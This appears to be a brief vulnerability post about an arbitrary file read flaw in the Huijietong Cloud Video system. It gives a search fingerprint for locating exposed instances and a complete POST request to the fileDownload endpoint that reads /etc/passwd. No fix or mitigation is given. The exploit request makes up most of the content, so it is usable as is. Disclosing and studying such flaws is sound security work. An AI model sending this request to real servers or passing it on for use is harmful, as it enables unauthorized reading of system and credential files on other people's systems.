Post

Huijietong Cloud Video Filedownload Arbitrary File Reading Vulnerability

Huijietong Cloud Video Filedownload Arbitrary File Reading Vulnerability

Huijietong Cloud Video fileDownload any file reading vulnerability

Vulnerability Description

Huijietong Cloud Video fileDownload There is a vulnerability to read any file on the server through the vulnerability.

Vulnerability Impact

Huijietong Cloud Video

Network surveying and mapping

body=”/him/api/rest/v1.0/node/role”

Vulnerability reappears

The login page is as follows

img

Send a request packet

POST /fileDownload?action=downloadBackupFile HTTP/1.1
Host: 
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6

fullPath=%2Fetc%2Fpasswd

img

##

This post is licensed under CC BY 4.0 by the author.